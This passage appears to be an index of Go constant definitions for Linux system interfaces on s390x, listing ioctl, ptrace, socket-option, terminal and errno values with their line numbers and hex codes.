0x4004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x8010743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x40107446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x4010744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x40107447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_DISABLE_TE (line 230) | PTRACE_DISABLE_TE = 0x5010 constant PTRACE_ENABLE_TE (line 231) | PTRACE_ENABLE_TE = 0x5009 constant PTRACE_GET_LAST_BREAK (line 232) | PTRACE_GET_LAST_BREAK = 0x5006 constant PTRACE_OLDSETOPTIONS (line 233) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_PEEKDATA_AREA (line 234) | PTRACE_PEEKDATA_AREA = 0x5003 constant PTRACE_PEEKTEXT_AREA (line 235) | PTRACE_PEEKTEXT_AREA = 0x5002 constant PTRACE_PEEKUSR_AREA (line 236) | PTRACE_PEEKUSR_AREA = 0x5000 constant PTRACE_PEEK_SYSTEM_CALL (line 237) | PTRACE_PEEK_SYSTEM_CALL = 0x5007 constant PTRACE_POKEDATA_AREA (line 238) | PTRACE_POKEDATA_AREA = 0x5005 constant PTRACE_POKETEXT_AREA (line 239) | PTRACE_POKETEXT_AREA = 0x5004 constant PTRACE_POKEUSR_AREA (line 240) | PTRACE_POKEUSR_AREA = 0x5001 constant PTRACE_POKE_SYSTEM_CALL (line 241) | PTRACE_POKE_SYSTEM_CALL = 0x5008 constant PTRACE_PROT (line 242) | PTRACE_PROT = 0x15 constant PTRACE_SINGLEBLOCK (line 243) | PTRACE_SINGLEBLOCK = 0xc constant PTRACE_SYSEMU (line 244) | PTRACE_SYSEMU = 0x1f constant PTRACE_SYSEMU_SINGLESTEP (line 245) | PTRACE_SYSEMU_SINGLESTEP = 0x20 constant PTRACE_TE_ABORT_RAND (line 246) | PTRACE_TE_ABORT_RAND = 0x5011 constant PT_ACR0 (line 247) | PT_ACR0 = 0x90 constant PT_ACR1 (line 248) | PT_ACR1 = 0x94 constant PT_ACR10 (line 249) | PT_ACR10 = 0xb8 constant PT_ACR11 (line 250) | PT_ACR11 = 0xbc constant PT_ACR12 (line 251) | PT_ACR12 = 0xc0 constant PT_ACR13 (line 252) | PT_ACR13 = 0xc4 constant PT_ACR14 (line 253) | PT_ACR14 = 0xc8 constant PT_ACR15 (line 254) | PT_ACR15 = 0xcc constant PT_ACR2 (line 255) | PT_ACR2 = 0x98 constant PT_ACR3 (line 256) | PT_ACR3 = 0x9c constant PT_ACR4 (line 257) | PT_ACR4 = 0xa0 constant PT_ACR5 (line 258) | PT_ACR5 = 0xa4 constant PT_ACR6 (line 259) | PT_ACR6 = 0xa8 constant PT_ACR7 (line 260) | PT_ACR7 = 0xac constant PT_ACR8 (line 261) | PT_ACR8 = 0xb0 constant PT_ACR9 (line 262) | PT_ACR9 = 0xb4 constant PT_CR_10 (line 263) | PT_CR_10 = 0x168 constant PT_CR_11 (line 264) | PT_CR_11 = 0x170 constant PT_CR_9 (line 265) | PT_CR_9 = 0x160 constant PT_ENDREGS (line 266) | PT_ENDREGS = 0x1af constant PT_FPC (line 267) | PT_FPC = 0xd8 constant PT_FPR0 (line 268) | PT_FPR0 = 0xe0 constant PT_FPR1 (line 269) | PT_FPR1 = 0xe8 constant PT_FPR10 (line 270) | PT_FPR10 = 0x130 constant PT_FPR11 (line 271) | PT_FPR11 = 0x138 constant PT_FPR12 (line 272) | PT_FPR12 = 0x140 constant PT_FPR13 (line 273) | PT_FPR13 = 0x148 constant PT_FPR14 (line 274) | PT_FPR14 = 0x150 constant PT_FPR15 (line 275) | PT_FPR15 = 0x158 constant PT_FPR2 (line 276) | PT_FPR2 = 0xf0 constant PT_FPR3 (line 277) | PT_FPR3 = 0xf8 constant PT_FPR4 (line 278) | PT_FPR4 = 0x100 constant PT_FPR5 (line 279) | PT_FPR5 = 0x108 constant PT_FPR6 (line 280) | PT_FPR6 = 0x110 constant PT_FPR7 (line 281) | PT_FPR7 = 0x118 constant PT_FPR8 (line 282) | PT_FPR8 = 0x120 constant PT_FPR9 (line 283) | PT_FPR9 = 0x128 constant PT_GPR0 (line 284) | PT_GPR0 = 0x10 constant PT_GPR1 (line 285) | PT_GPR1 = 0x18 constant PT_GPR10 (line 286) | PT_GPR10 = 0x60 constant PT_GPR11 (line 287) | PT_GPR11 = 0x68 constant PT_GPR12 (line 288) | PT_GPR12 = 0x70 constant PT_GPR13 (line 289) | PT_GPR13 = 0x78 constant PT_GPR14 (line 290) | PT_GPR14 = 0x80 constant PT_GPR15 (line 291) | PT_GPR15 = 0x88 constant PT_GPR2 (line 292) | PT_GPR2 = 0x20 constant PT_GPR3 (line 293) | PT_GPR3 = 0x28 constant PT_GPR4 (line 294) | PT_GPR4 = 0x30 constant PT_GPR5 (line 295) | PT_GPR5 = 0x38 constant PT_GPR6 (line 296) | PT_GPR6 = 0x40 constant PT_GPR7 (line 297) | PT_GPR7 = 0x48 constant PT_GPR8 (line 298) | PT_GPR8 = 0x50 constant PT_GPR9 (line 299) | PT_GPR9 = 0x58 constant PT_IEEE_IP (line 300) | PT_IEEE_IP = 0x1a8 constant PT_LASTOFF (line 301) | PT_LASTOFF = 0x1a8 constant PT_ORIGGPR2 (line 302) | PT_ORIGGPR2 = 0xd0 constant PT_PSWADDR (line 303) | PT_PSWADDR = 0x8 constant PT_PSWMASK (line 304) | PT_PSWMASK = 0x0 constant RLIMIT_AS (line 305) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 306) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 307) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 308) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 309) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 310) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 311) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 312) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 313) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 314) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 315) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 316) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 317) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 318) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 319) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 320) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 321) | RTC_EPOCH_READ = 0x8008700d constant RTC_EPOCH_SET (line 322) | RTC_EPOCH_SET = 0x4008700e constant RTC_IRQP_READ (line 323) | RTC_IRQP_READ = 0x8008700b constant RTC_IRQP_SET (line 324) | RTC_IRQP_SET = 0x4008700c constant RTC_PARAM_GET (line 325) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 326) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 327) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 328) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 329) | RTC_PLL_GET = 0x80207011 constant RTC_PLL_SET (line 330) | RTC_PLL_SET = 0x40207012 constant RTC_RD_TIME (line 331) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 332) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 333) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 334) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 335) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 336) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 337) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 338) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 339) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 340) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 341) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 342) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 343) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 344) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 345) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 346) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 347) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 348) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 349) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 350) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 351) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 352) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 353) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 354) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 355) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 356) | SIOCINQ = 0x541b constant SIOCOUTQ (line 357) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 358) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 359) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 360) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 361) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 362) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 363) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 364) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 365) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 366) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 367) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 368) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 369) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 370) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 371) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 372) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 373) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 374) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 375) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 376) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 377) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 378) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 379) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 380) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 381) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 382) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 383) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 384) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 385) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 386) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 387) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 388) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 389) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 390) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 391) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 392) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 393) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 394) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 395) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 396) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 397) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 398) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 399) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 400) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 401) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 402) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 403) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 404) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 405) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 406) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 407) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 408) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 409) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 410) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 411) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 412) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 413) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 414) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 415) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 416) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 417) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 418) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 419) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 420) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 421) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 422) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 423) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 424) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 425) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 426) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 427) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 428) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 429) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 430) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 431) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 432) | SO_TXTIME = 0x3d constant SO_TYPE (line 433) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 434) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 435) | SO_ZEROCOPY = 0x3c constant TAB1 (line 436) | TAB1 = 0x800 constant TAB2 (line 437) | TAB2 = 0x1000 constant TAB3 (line 438) | TAB3 = 0x1800 constant TABDLY (line 439) | TABDLY = 0x1800 constant TCFLSH (line 440) | TCFLSH = 0x540b constant TCGETA (line 441) | TCGETA = 0x5405 constant TCGETS (line 442) | TCGETS = 0x5401 constant TCGETS2 (line 443) | TCGETS2 = 0x802c542a constant TCGETX (line 444) | TCGETX = 0x5432 constant TCSAFLUSH (line 445) | TCSAFLUSH = 0x2 constant TCSBRK (line 446) | TCSBRK = 0x5409 constant TCSBRKP (line 447) | TCSBRKP = 0x5425 constant TCSETA (line 448) | TCSETA = 0x5406 constant TCSETAF (line 449) | TCSETAF = 0x5408 constant TCSETAW (line 450) | TCSETAW = 0x5407 constant TCSETS (line 451) | TCSETS = 0x5402 constant TCSETS2 (line 452) | TCSETS2 = 0x402c542b constant TCSETSF (line 453) | TCSETSF = 0x5404 constant TCSETSF2 (line 454) | TCSETSF2 = 0x402c542d constant TCSETSW (line 455) | TCSETSW = 0x5403 constant TCSETSW2 (line 456) | TCSETSW2 = 0x402c542c constant TCSETX (line 457) | TCSETX = 0x5433 constant TCSETXF (line 458) | TCSETXF = 0x5434 constant TCSETXW (line 459) | TCSETXW = 0x5435 constant TCXONC (line 460) | TCXONC = 0x540a constant TFD_CLOEXEC (line 461) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 462) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 463) | TIOCCBRK = 0x5428 constant TIOCCONS (line 464) | TIOCCONS = 0x541d constant TIOCEXCL (line 465) | TIOCEXCL = 0x540c constant TIOCGDEV (line 466) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 467) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 468) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 469) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 470) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 471) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 472) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 473) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 474) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 475) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 476) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 477) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 478) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 479) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 480) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 481) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 482) | TIOCINQ = 0x541b constant TIOCLINUX (line 483) | TIOCLINUX = 0x541c constant TIOCMBIC (line 484) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 485) | TIOCMBIS = 0x5416 constant TIOCMGET (line 486) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 487) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 488) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 489) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 490) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 491) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 492) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 493) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 494) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 495) | TIOCM_SR = 0x10 constant TIOCM_ST (line 496) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 497) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 498) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 499) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 500) | TIOCPKT = 0x5420 constant TIOCSBRK (line 501) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 502) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 503) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 504) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 505) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 506) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 507) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 508) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 509) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 510) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 511) | TIOCSETD = 0x5423 constant TIOCSIG (line 512) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 513) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 514) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 515) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 516) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 517) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 518) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 519) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 520) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 521) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 522) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 523) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 524) | TUNATTACHFILTER = 0x401054d5 constant TUNDETACHFILTER (line 525) | TUNDETACHFILTER = 0x401054d6 constant TUNGETDEVNETNS (line 526) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 527) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 528) | TUNGETFILTER = 0x801054db constant TUNGETIFF (line 529) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 530) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 531) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 532) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 533) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 534) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 535) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 536) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 537) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 538) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 539) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 540) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 541) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 542) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 543) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 544) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 545) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 546) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 547) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 548) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 549) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 550) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 551) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 552) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 553) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 554) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 555) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 556) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 557) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 558) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 559) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 560) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 561) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 562) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 563) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 564) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 565) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 566) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 567) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 568) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 569) | VDISCARD = 0xd constant VEOF (line 570) | VEOF = 0x4 constant VEOL (line 571) | VEOL = 0xb constant VEOL2 (line 572) | VEOL2 = 0x10 constant VMIN (line 573) | VMIN = 0x6 constant VREPRINT (line 574) | VREPRINT = 0xc constant VSTART (line 575) | VSTART = 0x8 constant VSTOP (line 576) | VSTOP = 0x9 constant VSUSP (line 577) | VSUSP = 0xa constant VSWTC (line 578) | VSWTC = 0x7 constant VT1 (line 579) | VT1 = 0x4000 constant VTDLY (line 580) | VTDLY = 0x4000 constant VTIME (line 581) | VTIME = 0x5 constant VWERASE (line 582) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 583) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 584) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 585) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 586) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 587) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 588) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 589) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 590) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 591) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 592) | WORDSIZE = 0x40 constant XCASE (line 593) | XCASE = 0x4 constant XTABS (line 594) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 595) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 596) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 597) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 602) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 603) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 604) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 605) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 606) | EALREADY = syscall.Errno(0x72) constant EBADE (line 607) | EBADE = syscall.Errno(0x34) constant EBADFD (line 608) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 609) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 610) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 611) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 612) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 613) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 614) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 615) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 616) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 617) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 618) | 